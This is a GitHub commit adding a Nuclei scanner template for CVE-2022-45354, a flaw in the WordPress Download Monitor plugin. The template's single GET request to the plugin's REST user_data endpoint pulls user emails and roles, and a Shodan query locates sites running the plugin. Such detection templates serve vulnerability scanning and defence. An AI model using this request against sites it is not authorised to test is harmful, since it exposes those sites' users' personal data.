Skip to content

Commit

Permalink
Merge pull request #7671 from projectdiscovery/CVE-2022-45354
Browse files Browse the repository at this point in the history
Create CVE-2022-45354.yaml
  • Loading branch information
pussycat0x committed Jul 12, 2023
2 parents 028de6d + 7d70eaa commit d887876
Showing 1 changed file with 39 additions and 0 deletions.
39 changes: 39 additions & 0 deletions http/cves/2022/CVE-2022-45354.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,39 @@
id: CVE-2022-45354

info:
name: Download Monitor <= 4.7.60 - Sensitive Information Exposure
author: DhiyaneshDK
severity: medium
description: |
The Download Monitor plugin for WordPress is vulnerable to Sensitive Information Exposure in versions up to, and including, 4.7.60 via REST API. This can allow unauthenticated attackers to extract sensitive data including user reports, download reports, and user data including email, role, id and other info (not passwords)
reference:
- https://github.com/RandomRobbieBF/CVE-2022-45354
- https://wordpress.org/plugins/download-monitor/
metadata:
verified: true
shodan-query: html:"/wp-content/plugins/download-monitor/"
max-request: 1
tags: cve,cve2023,wordpress,wp-plugin,download-monitor,wp

http:
- method: GET
path:
- "{{BaseURL}}/wp-json/download-monitor/v1/user_data"

matchers-condition: and
matchers:
- type: word
part: body
words:
- '"registered":'
- '"display_name":'
condition: and

- type: word
part: header
words:
- application/json

- type: status
status:
- 200

0 comments on commit d887876

Please sign in to comment.